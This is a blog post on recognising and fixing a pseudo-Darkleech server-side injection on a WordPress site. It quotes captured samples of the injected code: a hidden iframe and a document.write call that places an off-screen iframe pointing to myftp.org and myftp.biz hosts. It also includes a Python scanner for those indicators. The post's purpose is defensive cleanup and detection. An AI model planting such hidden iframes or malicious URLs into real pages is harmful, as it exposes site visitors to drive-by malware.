How to fix a pseudo-darkleech infected website?

If you want to know in detail how I struggled with this issue, check out this blog post: [Solved] My personal website was injected with malicious code | WordPress hit by a server-side Darkleech injection, iFrame pointing to servepics.com, myftp.org, myftp.biz (Google-translated from Chinese to English)

How to recognize whether your website has been infected with Darkleech malware

If you haven't changed anything on your website lately but suddenly see a pop-up window, a floating advertisement or a strange frame on your page, that is a sign your site may have been injected with malicious code. When you try to track the code down it has disappeared as if nothing happened, yet you saw the ad only minutes ago. Time to face it: your website has very likely been infected by pseudo-darkleech malware.

Samples of Darkleech malicious code

My WordPress blog was infected with Darkleech malware, the code looks like this:
<iframe src="http://bnlncvojj.myftp.org/q5evkc4qezi7bmfit3zhbap2edr5silbvbrzqw34l93yn2ebg" width="375" height="314">

document.write('<style>.ifbeky { position:absolute; left:-1007px; top:-1975px} </style> <div class="ifbeky"><iframe src="http://xxtfhvss.myftp.biz/q5evkc4qezi7bmfit3zhbap2edr5silbvbrzqw34l93yn2ebg" width="314" height="107"></iframe></div>');
All of the malicious code points dynamically to one (or several) of these domains: servepics.com, myftp.org, myftp.biz.

The second sample is a Chinese local portal website. The administrator had not made any update to the site, but one day someone found this fraudulent message (image omitted). The behaviour is that you only see the fraudulent image the first time you browse the site. The source code served to "people who can see the fraudulent image" and to "people who cannot see it (because they already saw it earlier that day)" differs only slightly: a div tag with the class "popContent" is added while the malicious code is active.

You may ask how I can be sure this malicious code lives on the server side rather than in your website's files. The reason is how the code behaves: it is written into the page only while the visitor can see the effect, and otherwise the malicious code is gone. Look at it the other way round: if the malicious code had been placed in a file, you would at least find it there whether or not the effect is showing. So I think this snippet of malicious code behaves much more like a WordPress plugin that works on the server side, which is why it can insert itself into any file at any time.
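As an added example (not code from the original post), here is a small Python scanner for the indicators the samples above show: an iframe whose host is under servepics.com, myftp.org or myftp.biz, an absolutely positioned container pushed far off-screen, and the "popContent" div. The two sample pages inside it are constructed, and the subdomain and path in the infected sample are placeholders, not values from the post.

```python
import re
from urllib.parse import urlparse

# Dynamic-DNS parent domains that the injected iframes in this post point to.
SUSPECT_DOMAINS = ("servepics.com", "myftp.org", "myftp.biz")

# <iframe ... src="..."> in served HTML, including markup wrapped inside a
# document.write('...') string, which the second sample uses.
IFRAME_RE = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)

# A CSS rule that parks an absolutely positioned element far off-screen
# (e.g. position:absolute; left:-1007px; top:-1975px), the trick used to hide
# the iframe container from the visitor while it still loads.
OFFSCREEN_RE = re.compile(
    r"position\s*:\s*absolute\s*;[^}]*?(?:left|top)\s*:\s*-\d{3,}px", re.IGNORECASE
)

# The wrapper that the portal sample gained only while the injection was active.
POPCONTENT_RE = re.compile(r"class\s*=\s*['\"][^'\"]*\bpopContent\b", re.IGNORECASE)


def host_is_suspect(url):
    """True if the URL's host is one of the suspect domains or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in SUSPECT_DOMAINS)


def scan_html(html):
    """Return a list of (indicator, evidence) tuples found in one served page."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        src = m.group(1)
        if host_is_suspect(src):
            findings.append(("iframe-to-dyndns", src))
    for m in OFFSCREEN_RE.finditer(html):
        findings.append(("offscreen-container", m.group(0)))
    if POPCONTENT_RE.search(html):
        findings.append(("popcontent-div", "div with class popContent present"))
    return findings


# Constructed sample pages (not captured from a real site) for a local dry run.
CLEAN_PAGE = (
    "<html><body><p>Welcome</p>"
    "<iframe src='https://www.example.com/embed/video'></iframe>"
    "</body></html>"
)
INFECTED_PAGE = (
    "<html><body><p>Welcome</p><script>"
    "document.write('<style>.ifbeky { position:absolute; left:-1007px; top:-1975px} </style>"
    " <div class=\"ifbeky\"><iframe src=\"http://EXAMPLE-SUBDOMAIN.myftp.biz/EXAMPLE-PATH\""
    " width=\"314\" height=\"107\"></iframe></div>');"
    "</script></body></html>"
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page))
```

Run it against HTML fetched fresh from the server rather than a page you already loaded in your browser: as the post notes, the injection only shows on a visitor's first view of the day, so a repeat request can come back clean. Running the same scanner over the theme and plugin files on disk and finding nothing, while it fires on the served page, is exactly the observation that led the author to conclude the code is inserted server-side. The domain list and the off-screen threshold are heuristics taken from this post's samples, so adjust them for what you actually see.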

What is the solution?

In my experience, changing server can help: just describe the problem you have to your service provider. In my case my service provider couldn't solve the issue, so I asked to move; after I deployed my blog to the new server, this annoying problem never bothered me again.
